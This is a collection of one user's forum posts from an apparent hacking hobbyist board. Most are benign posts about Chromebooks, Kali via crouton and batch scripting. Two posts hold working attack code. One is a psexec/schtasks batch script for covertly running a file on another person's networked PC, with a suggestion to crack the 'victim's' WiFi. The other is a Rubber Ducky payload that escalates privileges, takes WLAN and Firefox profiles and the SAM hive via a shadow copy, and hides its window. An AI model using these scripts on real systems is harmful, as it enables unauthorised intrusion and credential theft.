0phoi5

I feel like I have much to learn. I'm currently at the level of batch programs Any tips on what to move on to next? I was thinking Powershell and then Ruby?

I hope not! People will start thinking it's rubbish and be put off, when it's actually pretty amazing, with the right equipment!

Hi all, I'm using... wmic /node:%Hostname% os get lastbootuptime ... which gives the output as a WMIDateTime (Last time a PC was rebooted)... 20160104102930 Is there a way for me to convert this output to a nicely formatted date/time from within the batch file? In this case, I'd like the output to be something like 04/01/2016 10:29 I've had a look around the net, but couldn't find what I needed. Surely batch can do this, without having to rely on Javascript/Powershell? Thank you.

If you don't specify a username, the system would run FOO.bat as SYSTEM, which wouldn't give you much access to do anything. If you just put %USERNAME%, without specifying it's value in the script, it would attempt to pull your username from your PC, which likely would mean FOO.bat wouldn't run. *Edit* Note - It is only for the command... psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%" ... that you need to specify the %Username%. In the FOO.bat itself, you could put %Username% as undefined, as the batch file would be running as the target user anyway.

You can use Chroot nicely on it, for loading Linux. Works well and is quick and easy to set up; I use Kali on it - https://github.com/dnschneid/crouton/wiki/Kali Not as good as using a proper laptop, but it can be convenient sometimes. Essentially, yes, this is the equivilent of taking the battery out of your phone and putting it back, except you have to boot the Chromebook without the battery in it, to get it to error due to not finding the battery, then put it back.

Following on from what cooper states, I feel the same way. From experience, I've worked with simple programs in BASIC at work, that people who are supposed to know what they are doing have created, and they are a real dogs dinner. I think people get annoyed with BASIC because they spend more time fixing others mistakes / horrible code than actually getting to make new and nice things with it. I feel other languages 'force' the user into using slightly better practices, so if someone else picks it up, they can at least break it down rather than looking at a wall of text that some nutter threw together. *Edit* Spelling mistakes, again.

I should probably have a play, then! Haven't run any password hashes since getting the 960, sounds around 30x faster than my last card. I'd love a Titan, but spending £1k on a card would probably make me weep.

Me and my work colleagues were just on about this. Nice move! It's a shame I didn't put in, however I'm pretty sure I'll be buying one today anyway, if they don't sell out right away! Only 40 minutes to go now!

Damn, I have the same card, didn't realise it performed at that level. You using Hashcat?

Using PSTools can do this stealthily. You need to be connected to the same network. It shows a CMD window for a millisecond, barely noticable. Most people would think nothing of it. You DON'T need the user's password for this, just their username. Script also covers it's tracks and automatically runs in 80 seconds time. I cannot guarantee 100% this works in Windows 10. Tested in Windows 7 and 8. Can't remember if I got this to work when running the schtask as SYSTEM, give it a try. Anything in [ ] needs amending. XCOPY C:\FOO.bat \\[IP]\c$ /E /S /C /Y set hh=%time:~0,2% if "%hh:~,1%"=="0" set hh=%hh:~1,2% set mm=%time:~3,2% if "%mm:~,1%"=="0" set mm=%mm:~1,2% set /A mm=%mm%+2 if %mm% GEQ 60 set /A mm=%mm%-60 && set /A hh=%hh%+1 if %hh% GEQ 24 set hh=00 if %mm% LSS 10 set mm=%mm% if %hh% LSS 10 set hh=0%hh:~1,1% set hhmm=%hh%:%mm% echo %hhmm% psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /create /RU [USERNAME] /SC ONCE /TN [TASK NAME] /TR c:\FOO.bat /ST %hhmm%" Timeout 80 psexec \\[IP] -s -c -f cmd.exe /c "del C:\FOO.bat" psexec \\[IP] -s -c -f cmd.exe /c "Schtasks /Delete /TN [TASK NAME]" *Edit* I see you are trying this over the net. Apologies, maybe the above isn't quite what you want. However, you could try and amend this code and try to get it to work over the net (technically, I would say it was possible), or keep in kind that you could always travel to the location of your victim system. You'd just have to be close enough to crack their WiFi.

Ah, apologies! Fair enough. That'll give us all plenty of time to prepare

Interesting, if a little short, article on HackerNews today; http://thehackernews.com/2016/01/long-range-wifi-network.html Technically, this could make WiFi pentesting a teenie bit easier. Could certainly pick up/send a signal from futher away, with less equipment, based on the longer waves. Thoughts?

Just adding this to the folds of the internet, should someone else have the same issue. I took my new-ish Chromebook out the other day and it wouldn't turn on. The orange battery LED stayed solid orange, not flashing. Thinking the battery had died, I plugged it in and it successfully loaded up. I left it for an hour and looked at the charge. It hadn't moved from 1%. Unplugging the laptop from the power supply made it turn off. It got no power from the battery. The fix was simple, but took me a short while to find on the net, hence this post. Written in Layman's terms, should someone non-techie find this post. Unplug the laptop. Turn it over and remove all of the small screws. Keep them safe. Gently 'pop' the edges of the laptop's cover open. They have tiny clips around the outside. As you remove the cover, do it slowly. There is a cable between the power supply (not the battery) and the motherboard that is quite short, you could damage it if you pull the cover off with gusto. You will need to leave this plugged in to follow a step below, so leave it connected. Locate the small connecting wire between the battery and the motherboard. It's located between 6 and 7 on this image Unplug this connection. It's small and delicate, so be gentle. Treat her like a lady. Contrary to what you may have been told before, plug the power supply back in to the laptop and turn the power on. Leave the laptop itself turned off, just supply it some power. Don't touch anything inside the laptop and don't electrocte yourself, please. This step is to get the laptop to pick up the fact that the battery has been disconnected. Wait around 30 seconds. The LED for the battery indicator should change to red. The Chromebook is stating that it can't find the battery. Turn the power back off again. Plug the battery connection back in to the motherboard, the one that was pictured above. Put the cover back on, gently clipping it back in to place. Plug the laptop back in once more and turn it on. Boot it up. Hopefully, it should now be charging, as it's picked the battery back up again. If so, put your little screws back in and off you go. Enjoy! *edit* Amended spelling.

It's probably recommended to learn how to hack your own OS, based on the facts that; a.) You can better understand how to protect yourself from getting hacked b.) You can use Kali's tools to better understand how your attacks show up against a target system c.) You could potentially retaliate against someone who tries to attack you, as they are most-likely using Kali or similar

I'm not sure if this is the kind of information you are looking for, but you may wish to glance at / read ; http://null-byte.wonderhowto.com/how-to/hack-like-pro-create-virtual-hacking-lab-0157333/ Personally, I prefer to pentest actual devices, rather than virtual ones. But then, as you said, it's the cost that's the issue! Get hardware where you can afford it, though, as nothing beats the real thing.

You're more than welcome

Fair enough. I guess it just comes down to taste, then

Arch is OK, the issue is that it's optimized for the i686 and x86-64 architectures, which the Chromebook doesn't have. It uses a Tegra K1. Kali also better supports pentesting tools across a wider field. *Edit* You can also run Kali on anything. I have it on my phone as well.

DELAY 1200 GUI r DELAY 1200 STRING powershell Start-Process notepad -Verb runAs ENTER DELAY 1200 ALT y DELAY 1200 ENTER ALT SPACE DELAY 1200 STRING m DELAY 1200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss') ENTER STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime ENTER STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory ENTER STRING $date = get-date ENTER STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>" ENTER STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html' ENTER STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>" ENTER STRING $SysBootTime = Get-WmiObject Win32_OperatingSystem ENTER STRING $BootTime = $SysBootTime.ConvertToDateTime($SysBootTime.LastBootUpTime)| ConvertTo-Html datetime ENTER STRING $SysSerialNo = (Get-WmiObject -Class Win32_OperatingSystem -ComputerName $env:COMPUTERNAME) ENTER STRING $SerialNo = $SysSerialNo.SerialNumber ENTER STRING $SysInfo = Get-WmiObject -class Win32_ComputerSystem -namespace root/CIMV2 | Select Manufacturer,Model ENTER STRING $SysManufacturer = $SysInfo.Manufacturer ENTER STRING $SysModel = $SysInfo.Model ENTER STRING $OS = (Get-WmiObject Win32_OperatingSystem -computername $env:COMPUTERNAME ).caption ENTER STRING $disk = Get-WmiObject Win32_LogicalDisk -Filter "DeviceID='C:'" ENTER STRING $HD = [math]::truncate($disk.Size / 1GB) ENTER STRING $FreeSpace = [math]::truncate($disk.FreeSpace / 1GB) ENTER STRING $SysRam = Get-WmiObject -Class Win32_OperatingSystem -computername $env:COMPUTERNAME | Select TotalVisibleMemorySize ENTER STRING $Ram = [Math]::Round($SysRam.TotalVisibleMemorySize/1024KB) ENTER STRING $SysCpu = Get-WmiObject Win32_Processor | Select Name ENTER STRING $Cpu = $SysCpu.Name ENTER STRING $HardSerial = Get-WMIObject Win32_BIOS -Computer $env:COMPUTERNAME | select SerialNumber ENTER STRING $HardSerialNo = $HardSerial.SerialNumber ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select Name ENTER STRING $graphicsCard = gwmi win32_VideoController |select Name ENTER STRING $graphics = $graphicsCard.Name ENTER STRING $SysCdDrive = Get-WmiObject Win32_CDROMDrive |select -first 1 ENTER STRING $DriveLetter = $CDDrive.Drive ENTER STRING $DriveName = $CDDrive.Caption ENTER STRING $Disk = $DriveLetter + '' + $DriveName ENTER STRING $Firewall = New-Object -com HNetCfg.FwMgr ENTER STRING $FireProfile = $Firewall.LocalPolicy.CurrentProfile ENTER STRING $FireProfile = $FireProfile.FirewallEnabled ENTER STRING $Report = $Report + "<div id=left><h3>Computer Information</h3><br><table><tr><td>Operating System</td><td>$OS</td></tr><tr><td>OS Serial Number:</td><td>$SerialNo</td></tr><tr><td>Current User:</td><td>$env:USERNAME </td></tr><tr><td>System Uptime:</td><td>$BootTime</td></tr><tr><td>System Manufacturer:</td><td>$SysManufacturer</td></tr><tr><td>System Model:</td><td>$SysModel</td></tr><tr><td>Serial Number:</td><td>$HardSerialNo</td></tr><tr><td>Firewall is Active:</td><td>$FireProfile</td></tr></table></div><div id=right><h3>Hardware Information</h3><table><tr><td>Hardrive Size:</td><td>$HD GB</td></tr><tr><td>Hardrive Free Space:</td><td>$FreeSpace GB</td></tr><tr><td>System RAM:</td><td>$Ram GB</td></tr><tr><td>Processor:</td><td>$Cpu</td></tr><td>CD Drive:</td><td>$Disk</td></tr><tr><td>Graphics Card:</td><td>$graphics</td></tr></table></div>" ENTER STRING $UserInfo = Get-WmiObject -class Win32_UserAccount -namespace root/CIMV2 | Where-Object {$_.Name -eq $env:UserName}| Select AccountType,SID,PasswordRequired ENTER STRING $UserType = $UserInfo.AccountType ENTER STRING $UserSid = $UserInfo.SID ENTER STRING $UserPass = $UserInfo.PasswordRequired ENTER STRING $IsAdmin = ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator') ENTER STRING $Report = $Report +"<div id=left><h3>User Information</h3><br><table><tr><td>Current User Name:</td><td>$env:USERNAME</td></tr><tr><td>Account Type:</td><td> $UserType</td></tr><tr><td>User SID:</td><td>$UserSid</td></tr><tr><td>Account Domain:</td><td>$env:USERDOMAIN</td></tr><tr><td>Password Required:</td><td>$UserPass</td></tr><tr><td>Current User is Admin:</td><td>$IsAdmin</td></tr></table>" ENTER STRING $Report = $Report + '</div>' ENTER STRING $u = 0 ENTER STRING $allUsb = @(get-wmiobject win32_volume | select Name, Label, FreeSpace) ENTER STRING $Report = $Report + '<div id=right><h3>USB Devices</h3><table>' ENTER STRING do { ENTER STRING $gbUSB = [math]::truncate($allUsb[$u].FreeSpace / 1GB) ENTER STRING $Report = $Report + "<tr><td>Drive Name: </td><td> + " $allUsb[$u].Name + $allUsb[$u].Label + "</td><td>Free Space: </td><td>" + $gbUSB + "GB</td></tr>STRING Write-Output $fullUSB" ENTER STRING $u ++ ENTER STRING } while ($u -lt $allUsb.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=left><h3>Shared Drives/Devices</h3>' ENTER STRING $Report = $Report + (GET-WMIOBJECT Win32_Share | convertto-html Name, Description, Path) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Programs</h3> ' ENTER STRING $Report = $Report + (Get-WmiObject -class Win32_Product | ConvertTo-html Name, Version,InstallDate) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Report = $Report + '<div id=center><h3> Installed Updates</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_QuickFixEngineering -ComputerName $env:COMPUTERNAME | sort-object -property installedon -Descending | ConvertTo-Html Description, HotFixId,Installedon,InstalledBy) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>User Documents (doc,docx,pdf,rar)</h3>' ENTER STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx, *.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime) ENTER STRING $Report = $Report + '</div>' ENTER STRING $Report = $Report + '<div id=center><h3>Network Information</h3>' ENTER STRING $Report = $Report + (Get-WmiObject Win32_NetworkAdapterConfiguration -filter 'IPEnabled= True' | Select Description,DNSHostname, @{Name='IP Address ';Expression={$_.IPAddress}}, MACAddress | ConvertTo-Html) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $IP = Get-WmiObject Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' | Select IPAddress -First 1 ENTER STRING $IPAddr = $IP.IPAddress | Select-Object -Index 0 ENTER STRING $IPAddr -as [String] ENTER STRING $IPa = $IPAddr.Split('.') | Select -Index 0 ENTER STRING $IPb = $IPAddr.Split('.') | Select -Index 1 ENTER STRING $IPc = $IPAddr.Split('.') | Select -Index 2 ENTER STRING $IPAddr = $IPa + '.' + $IPb + '.' + $IPc + '.' ENTER STRING $Ping = new-object System.Net.Networkinformation.Ping ENTER STRING $ScanResults = 1..255| ForEach-Object {($Ping).Send($IpAddr + $_) } | Where-Object {$_.Status -eq 'Success'} | select Address ENTER STRING $x = 0 ENTER STRING $Report = $Report + '<div id=center><h3>Network Scan Results</h3><table>' ENTER STRING do { ENTER STRING $IPResults = $ScanResults | Select-Object -Index $x ENTER STRING $CompInfo = Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address | Select RegisteredUser, SystemDirectory ENTER STRING $CompName = (Get-WmiObject Win32_OperatingSystem -Computer $IPResults.Address).csname ENTER STRING $CurrIP = $IPResults.Address.IPAddressToString ENTER STRING $CurrOS = $CompInfo.SystemDirectory ENTER STRING $CurrName = $CompInfo.RegisteredUser ENTER STRING if ($CompInfo -ne $null){ ENTER STRING $Report = $Report + '<tr><td><b>IP Address:</b></td><td>' + $CurrIP + '</td><td><b>Compter Name: </b></td><td>' + $CompName + '</td><td><b>User Name: </b></td><td>' + $CurrName + '</td> <td><b>OS:</b> </td><td>' + $CurrOS + '</td></tr><br>' ENTER STRING }else{ ENTER STRING $Report = $Report + '<tr><td><b>IP Address: </b></td><td>' + $CurrIP + '</td><td><b>Computer Name: </b></td><td>NOT KNOWN</td><td><b>User Name: </b></td><td>NOT KNOWN</td><td><b>OS:</b></td><td>NOT KNOWN</td></tr><br>'} ENTER STRING $x ++ ENTER STRING } while ($x -lt $ScanResults.Count) ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $Computer = $env:COMPUTERNAME ENTER STRING $PortList = 0, 21, 22, 23, 25, 79, 80, 110, 113, 119, 135, 137, 139, 143, 389, 443, 445, 1002, 1024, 1030, 1720, 1900, 5000, 8080 ENTER STRING $Report = $Report + '<div id=right><h3>Port Scan of ' + $Computer + '</h3><table>' ENTER STRING foreach ($PortNumber in $PortList) { ENTER STRING $PortCheck = New-Object Net.Sockets.TcpClient ENTER STRING $PortCheck.Connect($Computer, $PortNumber) ENTER STRING if ($PortCheck.Connected) { ENTER STRING $Report = $Report + '<tr><td><b><font color=red>Port ' + $PortNumber + ' is open</font></b></td></tr>'} ENTER STRING else {$Report = $Report + '<tr><td>Port ' + $PortNumber + ' is closed</td></tr>'}} ENTER STRING $Report = $Report + '</table></div>' ENTER STRING $wlanSaveDir = New-Item $userDir'/Duck/WLAN_PROFILES' -ItemType Directory ENTER STRING $srcDir = 'C:/ProgramData/Microsoft/Wlansvc/Profiles/Interfaces' ENTER STRING Copy-Item $srcDir $wlanSaveDir -Recurse ENTER STRING $fireSaveDir = New-Item $userDir'\Duck\FireFox-Profile' -ItemType Directory ENTER STRING $fireDir = $userDir + '\AppData\Roaming\Mozilla\Firefox\Profiles' ENTER STRING $getFire = Get-Item -Path $fireDir -Exclude extensions ENTER STRING Copy-Item $getFire $fireSaveDir -Recurse ENTER STRING Start-Sleep -s 10 ENTER STRING $createShadow = (gwmi -List Win32_ShadowCopy).Create('C:\', 'ClientAccessible') ENTER STRING $shadow = gwmi Win32_ShadowCopy | ? { $_.ID -eq $createShadow.ShadowID } ENTER STRING $addSlash = $shadow.DeviceObject + '' ENTER STRING cmd /c mklink C:\shadowcopy $addSlash ENTER STRING Copy-Item 'C:\shadowcopy\Windows\System32\config\SAM' $fileSaveDir ENTER STRING Remove-Item -recurse -force 'C:\shadowcopy' ENTER STRING $Report >> $fileSaveDir'/ComputerInfo.html' ENTER STRING function copy-ToZip($fileSaveDir){ ENTER STRING $srcdir = $fileSaveDir ENTER STRING $zipFile = 'C:\Windows\Report.zip' ENTER STRING if(-not (test-path($zipFile))) { ENTER STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18)) ENTER STRING (dir $zipFile).IsReadOnly = $false} ENTER STRING $shellApplication = new-object -com shell.application ENTER STRING $zipPackage = $shellApplication.NameSpace($zipFile) ENTER STRING $files = Get-ChildItem -Path $srcdir ENTER STRING foreach($file in $files) { ENTER STRING $zipPackage.CopyHere($file.FullName) ENTER STRING while($zipPackage.Items().Item($file.name) -eq $null){ ENTER STRING Start-sleep -seconds 1 }}} ENTER STRING copy-ToZip($fileSaveDir) ENTER STRING $usbPresent = 'False' ENTER STRING do { ENTER STRING $present = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | Measure ENTER STRING if ($present.Count -ge 1){ ENTER STRING $usbPresent = 'True' }Else { ENTER STRING $usbPresent = 'False'}} ENTER STRING until ($usbPresent -eq 'True') ENTER STRING $driveLetter = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'HELLOWORLD' } | select Name ENTER STRING move-item c:\Windows\Report.zip $driveLetter.Name ENTER STRING remove-item $fileSaveDir -recurse ENTER STRING Remove-Item $MyINvocation.InvocationName ENTER CTRL S DELAY 1200 STRING C:\Windows\config-d6899.ps1 ENTER DELAY 1200 ALT F4 DELAY 1200 GUI r DELAY 1200 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 1200 ALT y DELAY 1200 STRING mode con:cols=14 lines=1 ENTER ALT SPACE DELAY 1200 STRING m DELAY 1200 DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW DOWNARROW ENTER STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false ENTER DELAY 1200 STRING powershell.exe -windowstyle hidden -File C:\Windows\config.ps1 ENTER

Hi all, So I placed the following scipt on my Rubber Ducky, as inject.bin (next post). I used the Payload Generator located here. I chose all Recon apart from Screen Capture, and Reporting as 'Save Files to USB' Drive. I plugged it in to a Windows 7 machine, with the machine being on the Desktop and not locked. It proceeded to do nothing for a while, then it opened a random image file I happened to have on my Desktop and zoomed in and out on it a few times. Then silence. I plugged in my USB, named 'HELLOWORLD', gave it a few minutes and then unplugged. The USB had nothing on it, which wasn't right. It failed to gather any information at all. Is there a way I can debug the script? As in, get it to tell me exactly what it's doing, as it does it, on-screen? Or maybe you have an idea of what went wrong? *NOTE* This bit at the start... STRING powershell Start-Process notepad -Verb runAs ... didn't open notepad. Notepad failed to open at any point. Cheers.

As a follow on to my last post, I found this; https://www.maketecheasier.com/map-crouton-installation-external-device-chromebook/ This describes a method to setup your Crouton installation to reside directly on an external device. Nice!

After many different approaches and attempts since my original post; I found the best way is to CHROOT in to Kali SANA using my Acer Chromebook 13. Download Crouton. Open shell using CTRL+ALT+T and typing shell. Use... sudo sh -e ~/Downloads/crouton -r sana -t xfce (amend as required) ... to install. You can use... sh ~/Downloads/crouton -r list ... to check the list of Linux distros available, sana was the one I went with as it was the latest available at the time I originally installed, there may be a later version now. Once installed, use... sudo startxfce4 ... to load Kali. If you have space left, install all of Kali with... sudo apt-get install kali-linux-full (probably not a good idea on a Chromebook, not much space on the SSD. I only install the programs I need). It's really that simple. Took me a while to find it though. You might be able to use a different Kali version name in place of 'sana', I didn't bother checking that out too much as sana is great anyway. The only thing I couldn't get working within the chrooted Kali was Tor. Doesn't seem to load no-matter what I try. Everything else works great. *edit* I unfortunately never did get Kali to boot on a Chromebook from a USB. Not the Chromebook 13, anyway. As cooper stated, it's down to the chip. The later Chromebooks with the Intel chip will boot USB Kali with no problems, but the Acer Chromebook doesn't seem to like it. If you do get it working, please let me know how! The above is a nice workaround though, as chances are you won't be using multiple Chromebooks you need a persistent Kali between. I assume.

I found this nice article on Null Byte as well; http://null-byte.wonderhowto.com/how-to/cover-your-tracks-after-hacking-wifi-0165952/

I can confirm barry's info as spot on. I personally have tried both and the USB 3.0 extension is the way to go. If you can't be bothered to make your own waterproof casing, use a plastic 'hobby box' you can get from any hardware store.

Have a good one all.